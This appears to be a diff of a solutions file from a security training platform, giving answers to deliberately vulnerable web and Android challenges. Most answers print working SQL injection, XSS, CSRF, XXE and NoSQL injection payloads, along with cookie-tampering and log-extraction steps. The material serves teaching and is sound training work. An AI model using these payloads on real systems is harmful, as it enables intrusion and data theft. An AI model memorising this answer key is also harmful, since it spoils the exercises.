-a4bf43f2ba5ced041b03d0b3f9fa3541c520d65d.solution=Base 64 Decode the &quot;checksum&quot; cookie in the request to find it equals &quot;userRole=user&quot;. Change the value of userRole to be administrator instead. The cookies new value should be &quot;dXNlclJvbGU9YWRtaW5pc3RyYXRvcg==&quot; when you replace it.
-5ca9115f3279b9b9f3308eb6a59a4fcd374846d6.solution=To complete this challenge, you must force an admin to submit a post request. The easiest way to achieve this is to force the admin to visit a custom webpage that submits the post request. This means the webpage needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. The following is an example webpage that would complete the challenge<br/><br/>&lt;html&gt;<br/>&lt;body&gt;<br/>&lt;form id=&quot;completeChallenge3&quot; action=&quot;https://hostname:port/user/csrfchallengethree/plusplus&quot; method=&quot;POST&quot; &gt;<br/>&lt;input type=&quot;hidden&quot; name=&quot;userid&quot; value=&quot;exampleId&quot; /&gt;<br/>&lt;input type=&quot;hidden&quot; name=&quot;csrfToken&quot; value=&quot;anythingExceptNull&quot; /&gt;<br/>&lt;input type=&quot;submit&quot;/&gt;<br/>&lt;/form&gt;<br/>&lt;script&gt;<br/>document.forms[&quot;completeChallenge3&quot;].submit();<br/>&lt;/script&gt;<br/>&lt;/body&gt;<br/>&lt;/html&gt;<br/><br/>The class form function should be used to create an iframe that forces the admin to visit this attack page.
-891a0208a95f1791287be721a4b851d4c584880a.solution=To complete this challenge, move every character five places back to get the following plaintext;<br/>The result key for this lesson is the following string; mylovelyhorserunningthroughthefieldwhereareyougoingwithyourbiga
-b6432a6b5022cb044e9946315c44ab262ab59e88.solution=To perform the CSRF correctly use the following attack string;<br/>https://hostname:port/user/redirect?to=https://hostname:port/root/grantComplete/unvalidatedredirectlesson?userid=tempId
-d4e2c37d8f1298fcaf4edcea7292cb76e9eab09b.solution=Input is being filtered. To complete this challenge, enter the following attack string;<br/>&lt;input type=&quot;button&quot; onmouseup=&quot;alert(&#39;XSS&#39;)&quot;/&gt
-20e755179a5840be5503d42bb3711716235005ea.solution=To complete this challenge, you can embed the CSRF request in an iframe very easily as follows;<br/>&lt;iframe src=&quot;https://hostname:port/user/csrfchallengeone/plusplus?userid=exampleId&quot;&gt;&lt;/iframe&gt;<br/>Then you need another user to be hit with the attack to mark it as completed
-544aa22d3dd16a8232b093848a6523b0712b23da.solution=To complete this challenge, the following attack strings will return all rows from the table:<br/>&quot; or &quot;1&quot; = &quot;1<br/>&quot; or &quot;a&quot; != &quot;<br/><br/>The query is not parameterising the query and is concatenating the user data to the query. A user only needs to use a double quote to escape the context of a String and perform the SQL injection
-52c5394cdedfb2e95b3ad8b92d0d6c9d1370ea9a.solution=The url of the result key is hidden in a div with an ID &quot;hiddenDiv&quot; that can be found in the source HTML of the lesson. User can also right click and inspect the element.
-ca8233e0398ecfa76f9e05a49d49f4a7ba390d07.solution=The following attack vector will work wonderfully;<br/>&lt;script&gt;alert(&#39;XSS&#39;)&lt;/script&gt;
-0e9e650ffca2d1fe516c5d7b0ce5c32de9e53d1e.solution=Use the password change function to send a functionality request. Stop this request with a proxy, and take the value of the &quot;current&quot; cookie. Base 64 Decode this two times. Modify the value to an administrator username such as &quot;admin&quot;. Encode this two times and change the value of the current cookie to reflect this change. Sign in as the username you set your current cookie's value to with the new password you set.
-9533e21e285621a676bec58fc089065dec1f59f5.solution=Use a proxy to stop the request to complete the lesson. Change the value of the &quot;lessonComplete&quot; cookie to &quot;lessonComplete&quot; to complete the lesson.
-408610f220b4f71f7261207a17055acbffb8a747.solution=The lesson can be completed with the following attack string<br/>' OR '1' = '1
-0709410108f91314fb6f7721df9b891351eb2fcc.solution=To complete this challenge, inspect the javascript that executes when the &quot;check&quot; is performed. The encryption key is stored in the &quot;theKey&quot; parameter. The last IF statement in the script checks if the output is equal to the encrypted Result Key.<br/>So the key and ciphertext is stored in the script. You can use this information to decrypt the result key manually with the vigenere cipher. You can also modify the javascript to decode the key for you. To do this, make the following changes;<br/> 1) Change the line &quot;input\_char\_value += alphabet . indexOf (theKey . charAt (theKey\_index));&quot; to: <br/>&quot;input\_char\_value -= alphabet . indexOf (theKey . charAt (theKey\_index));&quot;<br/>This inverts the process to decrypt instead of decrypt<br/>2) Add the following line to the end of the script:<br/>$(&quot;#resultDiv&quot;).html(&quot;Decode Result: &quot; + output);
-6319a2e38cc4b2dc9e6d840e1b81db11ee8e5342.solution=Input is being filtered. What is being filtered out is being completely removed. The filter does not act in a recursive fashion so with enough nested javascript triggers, it can be defeated. To complete this challenge, enter the following attack string;<br/>&lt;input type=&quot;button&quot; oncliconcliconclickkk=&quot;alert(&#39;XSS&#39;)&quot;/&gt;
-f771a10efb42a79a9dba262fd2be2e44bf40b66d.solution=To complete this challenge, the following attack string will return all rows from the table:<br/>test&#39;or&#39;&#39;!=&#39;2@test.com<br/>The input is validated as an email address before it is passed to the DB.
-5dda8dc216bd6a46fccaa4ed45d49404cdc1c82e.solution=To complete this challenge, you must craft a second statement to return Mary Martin's credit card number as the current statement only returns the customerName attribute. The following string will perform this; </br> &#39; UNION ALL SELECT creditCardNumber FROM customers WHERE customerName = &#39;Mary Martin<br/> The filter in this challenge is difficult to get around. But the 'UNION' operator is not being filtered. Using the UNION command you are able to return the results of custom statements.
-201ae6f8c55ba3f3b5881806387fbf34b15c30c2.solution=The lesson is encoded in Base64. Most proxy applications include a decoder for this encoding.
-82e8e9e2941a06852b90c97087309b067aeb2c4c.solution=The user Id's in this challenge are hashed using MD5. You can google the ID's to find their plain text if you have an internet connection to find their plain text. The sequence of ID's is as follows;<br/>2, 3, 5, 7, 9, 11<br/>The next number in the sequence is 13. Modify the request with a proxy so that the id is the MD5 of 13 (c51ce410c124a10e0db5e4b97fc2af39)
-a84bbf8737a9ca749d81d5226fc87e0c828138ee.solution=To complete this challenge without prior knowledge, a user must exploit an SQL injection flaw in a 'VIP Coupon Check' call. To find this function call they must deobfusticate the JavaScript file in the challenge. The address of the function is <b>challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62VipCouponCheck</b> on the exposed server. The parameter vulnerable to SQL injection in the POST request call to this URL is <b>couponCode</b>. There is no filter in this challenge so using <b>' union select itemId, percentOff, CONCAT('This is the couponCode: ', couponCode, ' ') from vipCoupons; -- </b> as the vulnerable parameter value will retrieve the necessary coupon.
-e0ba96bb4c8d4cd2e1ff0a10a0c82b5362edf998.solution=The filter in this challenge is removing all single quotes. However as there are two user parameters being utilised in the challenges login query, backslashes can be used to escape the user input's intended string context. The challenge can be completed with a user name of a <b>Backslash</b>  and a password of <b>OR 1 = 1 AND idusers = 7; -- </b> (Space after the -- is important!) so that you are signed in as the admin user.
-ad332a32a6af1f005f9c8d1e98db264eb2ae5dfe.solution=This challenge can be defeated by encoding SQL Injection attacks for \x UTF. For Example, the following will reveal the challenges result key; <b>\\x27\\x20UNION\\x20SELECT\\x20userAnswer\\x20FROM\\x20users\\x20WHERE\\x20userName\\x20\\x3D\\x20\\x27Brendan\\x27\\x3B\\x20--\\x20</b>
-182f519ef2add981c77a584380f41875edc65a56.solution=This challenge does not require a solution to be formed in XHTML to be detected. One way to pass this challenge is to submit the following; <b>http://test"oNmouseover=alert(123);//</b>
-fccf8e4d5372ee5a73af5f862dc810545d19b176.solution=This challenge does not require a solution to be formed in XHTML to be detected. One way to pass this challenge is to submit the following; <b>http://test""onmouseover=alert(123);//</b> 
-0a37cb9296ff3763f7f3a45ff313bce47afa9384.solution=To guarantee completing this CSRF Challenge in a single attempt, a user must craft a CSRF attack that sends a POST request, to the request described in the challenge write up, with all of the possible CSRF tokens for the challenge. The only possible csrf tokens for this challenge are 0, 1 and 2.
-04a5bd8656fdeceac26e21ef6b04b90eaafbd7d5.solution=To guarantee completing this CSRF Challenge in a single attempt, a user must craft a CSRF attack that sends a POST request, to the request described in the challenge write up, with all of the possible CSRF tokens for the challenge. The only possible csrf tokens for this challenge are c4ca4238a0b923820dcc509a6f75849b, c81e728d9d4c2f636f067f89cc14862c and eccbc87e4b5ce2fe28308fd9f2a7baf3.
-853c98bd070fe0d31f1ec8b4f2ada9d7fd1784c5.solution=To complete this challenge, a user must exploit an SQL Wild Card Enumeration in the 'Retrieve Token' function to retrieve other users CSRF token (Submit a percentage sign - you may need to encode it to %25). This information must be utilised to launch a CSRF attack against them before they refresh the challenge page themselves. Once a victim refreshes the challenge page, their token updates. Social Engineering will need to be utilised to successfully complete this challenge.
-3d5b46abc6865ba09aaff98a8278a5f5e339abff.solution=View the source of this challenge and inspect the JavaScript at the end of the page. It contains two functions, and one of them is for a HTML element that is not in the level. This function is an admin function and reveals a URL very similar to the user function. Send a valid post request, as described by the JavaScript, to that URL to retrieve the result key.
-c7ac1e05faa2d4b1016cfcc726e0689419662784.solution=View the source of this challenge and inspect the JavaScript at the end of the page. You can deobfusticate the JavaScript with an on line web tool, give it a Google. The script contains two functions, and one of them is for a HTML element that is not in the level. This function is an admin function and reveals a URL very similar to the user function. Send a valid post request, as described by the JavaScript, to that URL to retrieve the result key.
-b3cfd5890649e6815a1c7107cc41d17c82826cfa.solution=There are a number of ways to defeat the crypto and get the encryption key in this challenge. The quickest way is to submit base64 encoded spaces. The crypto XOR's the spaces with the key and returns the resultant 'cipher text which is the encryption key.
-ced925f8357a17cfe3225c6236df0f681b2447c4.solution=Users must discover the session id for this sub application is very weak. The default session ID for a guest will be 00000001 base64'd twice. The admin's session ID is TURBd01EQXdNREF3TURBd01EQXdPUT09 (0000000000000009 when decoded).
-c6841bcc326c4bad3a23cd4fa6391eb9bdb146ed.solution=This challenge does not require a solution to be formed in XHTML to be detected. One way to pass this challenge is to submit the following; <b> http://""onmouseover=alert(123);//</b>
-53a53a66cb3bf3e4c665c442425ca90e29536edd.solution=The Admin credentials are stored in plain text in a db file. Go to /data/data/insecuredata/databases and run the following command " Strings Members" or "cat Members". To get to root CLI on the VM press alt F1.
-307f78f18fd6a87e50ed6705231a9f24cd582574.solution=The Admin credentials are encoded in a db file. Go to /data/data/insecuredata1/databases and cat the Users.db file. Burp has a decoder which will reveal the key, alternatively there are online tools which can also do this
-da3de2e556494a9c2fb7308a98454cf55f3a4911.solution=The Admin credentials are hashed (but not salted) in a db file. Go to /data/data/insecuredata2/databases and cat the db file called Password.db. The key is a password which has been hashed using MD5, there are online tools which will attempt to crack this hashed value.
-335440fef02d19259254ed88293b62f31cccdd41.solution=The Login is vulnerable to SQL injection, Admin ' OR 1 = 1 ; -- will work in the username field and anything in the password field (So a blank field error does not occur).
-a3f7ffd0f9c3d15564428d4df0b91bd927e4e5e4.solution=The login is vulnerable to SQL injection however, some input is being filtered. OR + 1 = 1 will be filtering into spaces of comments. anyOtherValue=anyOtherValue will work as well as 0r.
-e635fce334aa61fdaa459c21c286d6332eddcdd3.solution=The login is vulnerable to SQL injection however there is filtering in place, to get an OR in the statement use OORR, to get a comment use -OR-. So the following statement should work: Admin ' oorr 'a' = 'a' ; -or-
-ef6496892b8e48ac2f349cdd7c8ecb889fc982af.solution=The chat has not been encrypted but encoded using hex, this can be decoded using burp or the following site:http://www.asciitohex.com/
-3f010a976bcbd6a37fba4a10e4a057acc80bdc09.solution=The chat has been encrypted using DES. The same key is used every time and the key is stored insecurely within the app package.
-63bc4811a2e72a7c833962e5d47a41251cd90de3.solution=The chat has been encrypted using AES (with CBC mode). Multiple keys are used this time but keys are stored insecurely on the App. key 1 decrypts message 1, key 2 decrypts message 2 and so forth.
-2ab09c0c18470ae5f87d219d019a1f603e66f944.solution=The key is stored in the source code of the App, get dex2jar and use it to turn the apk to a jar file, then open the jar and find the key in the main class.
-f16bf2ab1c1bf400d36330f91e9ac6045edcd003.solution=The key is stored in the source code of the App, get dex2jar and use it to turn the apk to a jar file, then open the jar. The key is present within a conditional statement in the class called Triangle.
-9e46e3c8bde42dc16b9131c0547eedbf265e8f16.solution=The key is not present in the code, however a check for the key is. This can be reverse engineered and the code extracted and run as a java class. Running this java class after changing the check to print the key will reveal it.
-1506f22cd73d14d8a73e0ee32006f35d4f234799.solution=Logs are stored insecurely on the App. These contain the key. The logs can be found in a directory called "files" within the app package in the data/data directory. Every time the app is interacted with, new logs are generated.
-ed732e695b85baca21d80966306a9ab5ec37477f.solution=In this challenge you must craft a HTTP request to reset an admin accounts password. The HTTP request is described in the javascript contained in the challenge page (The last function in the script). The token value in this request must be a base 64 encoded date time value such as the following;<br><br> <b>Thu Aug 28 18:48:10 BST 2014</b><br><br> The token value must be less than 10 minutes from the servers time.
-cfbf7b915ee56508ad46ab79878f37fd9afe0d27.solution=To complete this challenge a user must craft a CSRF attack that sends a POST request, to the request described in the challenge write up, with their CSRF token. This CSRF Token will work on any user.
-9294ba32bdbd680e3260a0315cd98bf6ce8b69bd.solution=The first step in completing this challenge is to get an admin user's email address. Try to sign in as 'root' or 'superuser' to get one. To complete this challenge a user must use SQL Injection in the email Parameter in the GET request to the SecretQuestion servlet. The following email submission will achieve the response of the users secret answer (This example is URL Encoded)<br><br/>&quot;UNION+SELECT+secretAnswer+FROM+users+WHERE+userName=&quot;<b>root</b><br><br>You can then use this answer along with a user email address to complete the level.
-7153290d128cfdef5f40742dbaeb129a36ac2340.solution=To complete this challenge a user must send the server a request with the 'challengeRole' value set to 'nmHqLjQknlHs'. The challengeRole cookie is encoded with ATOM-128. The value 'nmHqLjQknlHs' when decoded is 'superuser'.
-145111e80400e4fd48bd3aa5aca382e9c5640793.solution=To complete this challenge a user must deobfusticate the javascript found in /couponCheck.js and extract the relevent cryptoinformation to manually decrypt a javascript array of encrypted coupons, or to manipulate the javascript so that it returns the decrypted coupons. The &quot;des&quot; function call reveals the Encryption key and the padding used by the algorithm. The &quot;des&quot; function in the javascript can be changed to decryption mode by changing the boolean argument to negative. The text to be decoded needs to be taken from the array of encrypted coupon codes. To recover the coupon code for free oranges you can run this command from your browsers console when opened in the context of the level&apos;s JSP page; <b> des(chars_from_hex(&apos;0ba950d08830c8079bded71b852934453db8f4ffff1f5842&apos;), chars_from_hex(bits[6]), 0, chars_from_hex(&apos;821fd38b9a7c0247&apos;) ? 1 : 0, chars_from_hex(&apos;821fd38b9a7c0247&apos;));</b>
-adc845f9624716eefabcc90d172bab4096fa2ac4.solution=To complete this challenge, a SQL Injection Flaw must be exploited to learn the name of the super admin in a request described in the module's javascript. This function is not used by the presented HTML. You must manually craft this request and include an injection attack through the BASE64 encoded cookie named 'currentPerson'. a simple &quot;or&quot;1&quot;!=&quot;0 vector will work. Take the super admin's name and submit it encoded for BASE64 as the currentPerson cookie value in the request that is submitted when the Admin button is clicked. This will return the result key for the challenge.
-64070f5aec0593962a29a141110b9239d73cd7b3.solution=To complete this challenge, a SQL injection flaw must be exploited. The vulnerable paramater is 'subUserEmail'. It must be mostly well formed as an email address to get past the validation process. The following vector, which is URL encoded, will sign the user in as user 1. <br><br><b>'or'1'='1'union%0aselect%0auserName%0afrom%0ausers%0awhere''!='%40v</b>
-1e3c02ad49fa9a9e396a3b268d7da8f0b647d8f9.solution=To complete this challenge, connect the android debug bridge to the VM and run  adb logcat –d \<file location\> to dump logs to a text file. Trigger the key log by pressing the lotto button
-f40b0cd5d45327c9426675313f581cf70c7c7c28.solution=To complete this challenge, start the app, go to the command line of the VM using ALT F1 and then navigate to /sdcard/, pictorial logs are places there. Connect adb to the device and run the adb pull command on the logs. 
-ba6e65e4881c8499b5e53eb33b5be6b5d0f1fb2c.solution=To complete this challenge, start the app, and login to get the key. you must login with an auth code. the code must be odd, must contain the numbers 2 and 4 and must be six digits long. previous codes may show up in a suggestion when typing the code in which will reveal this pattern.
-52885a3db5b09adc24f38bc453fe348f850649b3.solution=To complete this challenge, find jarsigner which comes with the jdk and in a command line run the following:  jarsigner -verify -verbose -certs ReverseEngineer2.apk.
-3b1af0ad239325bf494c6e606585320b31612e72.solution=To complete this challenge, use adb pull to grab the key file and the key.db file from the app's /data/data/ directory. With the db password: Pa88w0rd1234 decrypt the database to get the key to the level. This will either require a small amount of coding or you can download and build sqlcipher. Finally there is an App on the playstore which can be used called SQLCipher Decrypt.
-0cdd1549e7c74084d7059ce748b93ef657b44457.solution=To complete this challenge, you need to login to the App. The password reset function rquires two answers which can be gathered from the logs on the App. The answers are chicken and meade. This will reset the password to a six digit code and allow you to login and view the key.
-368491877a0318e9a774ba5d648c33cb0165ba1e.solution=This challenge requires a bit of thinking to complete organically. First you must find some admin email addresses. The login function will return them when valid usernames are submitted. Try using root or superuser with any password. Use the email address in the secret question function to get that user's Secret Question. The secret question for each user is 'What is your favourite flower?'. There are only so many flowers. Any of the following flowers are valid answers. Root's favourite flower is 'Franklin Tree'. <br><br> Valid answers: Jade Vine, Corpse Flower, Gibraltar Campion, Franklin Tree, Middlemist Red, Chocolate Cosmos or Ghost Orchid
-6be5de81223cc1b38b6e427cc44f8b6a28d2bc96.solution=The shopping cart application does not validate the number of items you are buying. Set the orange amount to 1, apple amount to 0, banana amount to 0 and the pineapple amount to -101.
-3b14ca3c8f9b90c9b2c8cd1fba9fa67add1272a3.solution=The shopping cart application only ensures that the amount of items bought is a positive number. By buying 999295724 oranges, the total cost integer value will overflow and enter a negative state.
-b9d82aa7b46ddaddb6acfe470452a8362136a31e.solution=Enter a valid number in the submit box and click submit number. Capture the request in a HTTP proxy and modify the number to a negative value.
-bf847c4a8153d487d6ec36f4fca9b77749597c64.solution=Sign into the application with the generic admin default combination of 'admin' and 'password'.
-fcc2558e0a23b8420e173cf8029876cb887408d3.solution=To complete this challenge, you must force another user to submit a post request which contains a JSON payload. The easiest way to achieve this is to force the user to visit a custom web page that submits the post request. This means the web page needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. It is possible to use HTML forms to submit cross domain POST requets with JSON payloads by setting the <b>enctype</b> attribute to text/plain and then forming the JSON payload around the necessary equals symbol which normally deliminates the parameter name from the parameter value. The following is an example web page that would complete the challenge<br/><br/>&lt;html&gt;<br/>&lt;body&gt;<br/>&lt;form id=&quot;completeChallengeJson&quot; enctype=&quot;text/plain&quot; action=&quot;https://hostname:port/user/csrfchallengetwo/plusplus&quot; method=&quot;POST&quot; &gt;<br/>&lt;input type=&quot;hidden&quot; name=&#x27;{&quot;userId&quot;:&quot;exampleId&quot;,&quot;&#x27; value=&#x27;&quot;,&quotend&quote}&#x27;><br/>&lt;/form&gt;<br/>&lt;script&gt;<br/>document.forms[&quot;completeChallengeJson&quot;].submit();<br/>&lt;/script&gt;<br/>&lt;/body&gt;<br/>&lt;/html&gt;<br/><br/>The class form function should be used to create an iframe that forces the user to visit this attack page.
-6158a695f20f9286d5f12ff3f4d42678f4a9740c.solution=To complete this challenge, you must be able to capture the traffic of another user. The simplest way to simulate this would be to create a second user account and open it in a separate browser and open this challenge. You could then just steal the cookie straight from the browser. To demo how to solve this as expected you would actually open Wireshark and record the 2nd user opening the challenge. Filter the network capture for ip.dst == ShepherdInstanceIp, and find the unencrypted HTTP packet. Right click it and select 'Follow TCP stream'. You'll see the cookie in that dialog. <br><br> Once you have the token collected, in your original browser, click the button and intercept the request with a Proxy. Replace your cookie value with the one you collected from another user.
-de626470273c01388629e5a56ac6f17e2eef957b.solution=To complete this challenge you must first register an account. The account must have a unique name. The next step is to click the refresh balance button. Capture this request, and replay it with different account numbers until you find one with cash. If you are the first person to attempt this challenge, the account number 1 should have 10 million in it. Take note of the account number that has cash. Now fill out the 'Transfer Funds' form with any data. Capture that requets and change the receiver account number parameter to the value the sender account number parameter is currently equal to (This is your account number), change the sender account number to the identifier you noted earlier and set the transfer amount to as high as possible (must be some money left in account to work). Keep doing this untill your account has more than 5 million in it. Then open the level again or sign in / out of the account to get the result key
-dc89383763c68cba0aaa1c6f3fd4c17e9d49a805.solution=The following attack vectors will expose the result key over two queries.<br><br>Step One: <b>test' AND (SELECT 7303 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(comment AS CHAR),0x20)),1,50) FROM sqlchalstoredproc.customers ORDER BY customerId LIMIT 2,1),0x71786b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hdTL'='hdTL</b><br><br>This will return an error revealing the first part of the key in the message with <b>qxkzq1</b> added to the end for padding. remove those characters and record the rest of the key revealed. <br><br>Step Two: <b>test' AND (SELECT 9441 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(comment AS CHAR),0x20)),51,50) FROM sqlchalstoredproc.customers ORDER BY customerId LIMIT 2,1),0x71786b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ilGf'='ilGf</b><br><br>This will reveal the second part of the key, padded with <b>qkjvq</b> at the start and <b>qxkzq1</b> at the end. Remove the padding and add the rest to the previously revealed part of the result key. That is the key to solve this challenge.
-5b461ebe2e5e2797740cb3e9c7e3f93449a93e3a.solution=Connect to the device via adb and run the following command - adb shell content query --uri content://com.somewhere.hidden.SecretProvider/data
-c685f8102ae0128c2ab342df64699bb8209a0839.solution=One way to exploit this security risk is to escape the leading backslash that is added before apostrophes with another backslash. The following attack vector will solve the level;<br><br> &#x5c;&apos;or&quot;1&quot;=&quot;1&quot;&#x3b;&nbsp--&nbsp
-d7eaeaa1cc4f218abd86d14eefa183a0f8eb6298.solution=The database in this level utilises MongoDb which does NOT use SQL. Queries in MongoDb are done through JavaScript. <br>You need to stop the request in an HTTP proxy and use the following JavaScript to exploit the vulnerability:<br /> <em>';return(true);var a='a</em>
-f02ce6bcd0a822d245433533997eaf44379065f4.solution=This challenge is difficult to exploit and heavily depends on your user name. See <a href="https://github.com/OWASP/SecurityShepherd/issues/280">this github ticket</a> for more details. This was a vulnerability in Security Shepherd that was fixed
-df2ac757cc135dcb8ce5ea01f677c74f04b446d6.solution=To exploit this take Example 1, replace file:///etc/shadow with file:///usr/local/tomcat/briefcase.pulp and also replace &#x3C;foo&#x3E;&xxe;&#x3C;/foo&#x3E; with &#x3C;email&#x3E;&xxe;&#x3C;/email&#x3E;
-08b3dffd4b837ebe53d52e53b5bbbabf4a4ca9ae.solution=To exploit this view the source of the iframe where you'll see two functions for sending a request - leFormNew and leFormOld. The new one is for JSON and the old one uses XML where the developers left this one in place and can be exploited through XML injection. It is exploited the very same way as the XXE lesson.
\ No newline at end of file
+0dbea4cb5811fff0527184f99bd5034ca9286f11.solution = Stop the request with a proxy and change the &quot;username&quot; parameter to be equal to &quot;admin&quot;
+453d22238401e0bf6f1ff5d45996407e98e45b07.solution = To complete the lesson, the attack string is the following:<br/>&quot;https://hostname:port/root/grantComplete/csrfLesson?userId=tempId&quot;
+cd7f70faed73d2457219b951e714ebe5775515d8.solution = Input is being filtered. To complete this challenge, enter the following attack string: <br/>&lt;iframe src=&#39;#&#39; onload=&#39;alert(&quot;XSS&quot;)&#39;&gt;&lt;/iframe&gt
+2dc909fd89c2b03059b1512e7b54ce5d1aaa4bb4.solution = The user Ids in this challenge follow a sequence 1,3,5 etc. The Hidden Users ID is 11
+94cd2de560d89ef59fc450ecc647ff4d4a55c15d.solution = To complete this challenge, you must force another user to submit a post request. The easiest way to achieve this is to force the user to visit a custom webpage that submits the post request. This means the webpage needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. The following is an example webpage that would complete the challenge<br/><br/>&lt;html&gt;<br/>&lt;body&gt;<br/>&lt;form id=&quot;completeChallenge2&quot; action=&quot;https://hostname:port/user/csrfchallengetwo/plusplus&quot; method=&quot;POST&quot; &gt;<br/>&lt;input type=&quot;hidden&quot; name=&quot;userId&quot; value=&quot;exampleId&quot; /&gt;<br/>&lt;input type=&quot;submit&quot;/&gt;<br/>&lt;/form&gt;<br/>&lt;script&gt;<br/>document.forms[&quot;completeChallenge2&quot;].submit();<br/>&lt;/script&gt;<br/>&lt;/body&gt;<br/>&lt;/html&gt;<br/><br/>The class form function should be used to create an iframe that forces the user to visit this attack page.
+b70a84f159876bb9885b6e0087d22f0a52abbfcf.solution = Use the login function with usernames like admin, administrator, root, etc to find administrator email accounts. Use the forgotten password functionality to change the password for the email address recovered. Inspect the response of the password reset request to see what the password was reset to. Use this password to login!
+a4bf43f2ba5ced041b03d0b3f9fa3541c520d65d.solution = Base 64 Decode the &quot;checksum&quot; cookie in the request to find it equals &quot;userRole=user&quot;. Change the value of userRole to be administrator instead. The cookies new value should be &quot;dXNlclJvbGU9YWRtaW5pc3RyYXRvcg==&quot; when you replace it.
+5ca9115f3279b9b9f3308eb6a59a4fcd374846d6.solution = To complete this challenge, you must force an admin to submit a post request. The easiest way to achieve this is to force the admin to visit a custom webpage that submits the post request. This means the webpage needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. The following is an example webpage that would complete the challenge<br/><br/>&lt;html&gt;<br/>&lt;body&gt;<br/>&lt;form id=&quot;completeChallenge3&quot; action=&quot;https://hostname:port/user/csrfchallengethree/plusplus&quot; method=&quot;POST&quot; &gt;<br/>&lt;input type=&quot;hidden&quot; name=&quot;userid&quot; value=&quot;exampleId&quot; /&gt;<br/>&lt;input type=&quot;hidden&quot; name=&quot;csrfToken&quot; value=&quot;anythingExceptNull&quot; /&gt;<br/>&lt;input type=&quot;submit&quot;/&gt;<br/>&lt;/form&gt;<br/>&lt;script&gt;<br/>document.forms[&quot;completeChallenge3&quot;].submit();<br/>&lt;/script&gt;<br/>&lt;/body&gt;<br/>&lt;/html&gt;<br/><br/>The class form function should be used to create an iframe that forces the admin to visit this attack page.
+891a0208a95f1791287be721a4b851d4c584880a.solution = To complete this challenge, move every character five places back to get the following plaintext;<br/>The result key for this lesson is the following string; mylovelyhorserunningthroughthefieldwhereareyougoingwithyourbiga
+b6432a6b5022cb044e9946315c44ab262ab59e88.solution = To perform the CSRF correctly use the following attack string;<br/>https://hostname:port/user/redirect?to=https://hostname:port/root/grantComplete/unvalidatedredirectlesson?userid=tempId
+d4e2c37d8f1298fcaf4edcea7292cb76e9eab09b.solution = Input is being filtered. To complete this challenge, enter the following attack string;<br/>&lt;input type=&quot;button&quot; onmouseup=&quot;alert(&#39;XSS&#39;)&quot;/&gt
+20e755179a5840be5503d42bb3711716235005ea.solution = To complete this challenge, you can embed the CSRF request in an iframe very easily as follows;<br/>&lt;iframe src=&quot;https://hostname:port/user/csrfchallengeone/plusplus?userid=exampleId&quot;&gt;&lt;/iframe&gt;<br/>Then you need another user to be hit with the attack to mark it as completed
+544aa22d3dd16a8232b093848a6523b0712b23da.solution = To complete this challenge, the following attack strings will return all rows from the table:<br/>&quot; or &quot;1&quot; = &quot;1<br/>&quot; or &quot;a&quot; != &quot;<br/><br/>The query is not parameterising the query and is concatenating the user data to the query. A user only needs to use a double quote to escape the context of a String and perform the SQL injection
+52c5394cdedfb2e95b3ad8b92d0d6c9d1370ea9a.solution = The url of the result key is hidden in a div with an ID &quot;hiddenDiv&quot; that can be found in the source HTML of the lesson. User can also right click and inspect the element.
+ca8233e0398ecfa76f9e05a49d49f4a7ba390d07.solution = The following attack vector will work wonderfully;<br/>&lt;script&gt;alert(&#39;XSS&#39;)&lt;/script&gt;
+0e9e650ffca2d1fe516c5d7b0ce5c32de9e53d1e.solution = Use the password change function to send a functionality request. Stop this request with a proxy, and take the value of the &quot;current&quot; cookie. Base 64 Decode this two times. Modify the value to an administrator username such as &quot;admin&quot;. Encode this two times and change the value of the current cookie to reflect this change. Sign in as the username you set your current cookie's value to with the new password you set.
+9533e21e285621a676bec58fc089065dec1f59f5.solution = Use a proxy to stop the request to complete the lesson. Change the value of the &quot;lessonComplete&quot; cookie to &quot;lessonComplete&quot; to complete the lesson.
+408610f220b4f71f7261207a17055acbffb8a747.solution = The lesson can be completed with the following attack string<br/>' OR '1' = '1
+0709410108f91314fb6f7721df9b891351eb2fcc.solution = To complete this challenge, inspect the javascript that executes when the &quot;check&quot; is performed. The encryption key is stored in the &quot;theKey&quot; parameter. The last IF statement in the script checks if the output is equal to the encrypted Result Key.<br/>So the key and ciphertext is stored in the script. You can use this information to decrypt the result key manually with the vigenere cipher. You can also modify the javascript to decode the key for you. To do this, make the following changes;<br/> 1) Change the line &quot;input\_char\_value += alphabet . indexOf (theKey . charAt (theKey\_index));&quot; to: <br/>&quot;input\_char\_value -= alphabet . indexOf (theKey . charAt (theKey\_index));&quot;<br/>This inverts the process to decrypt instead of decrypt<br/>2) Add the following line to the end of the script:<br/>$(&quot;#resultDiv&quot;).html(&quot;Decode Result: &quot; + output);
+6319a2e38cc4b2dc9e6d840e1b81db11ee8e5342.solution = Input is being filtered. What is being filtered out is being completely removed. The filter does not act in a recursive fashion so with enough nested javascript triggers, it can be defeated. To complete this challenge, enter the following attack string;<br/>&lt;input type=&quot;button&quot; oncliconcliconclickkk=&quot;alert(&#39;XSS&#39;)&quot;/&gt;
+f771a10efb42a79a9dba262fd2be2e44bf40b66d.solution = To complete this challenge, the following attack string will return all rows from the table:<br/>test&#39;or&#39;&#39;!=&#39;2@test.com<br/>The input is validated as an email address before it is passed to the DB.
+5dda8dc216bd6a46fccaa4ed45d49404cdc1c82e.solution = To complete this challenge, you must craft a second statement to return Mary Martin's credit card number as the current statement only returns the customerName attribute. The following string will perform this; </br> &#39; UNION ALL SELECT creditCardNumber FROM customers WHERE customerName = &#39;Mary Martin<br/> The filter in this challenge is difficult to get around. But the 'UNION' operator is not being filtered. Using the UNION command you are able to return the results of custom statements.
+201ae6f8c55ba3f3b5881806387fbf34b15c30c2.solution = The lesson is encoded in Base64. Most proxy applications include a decoder for this encoding.
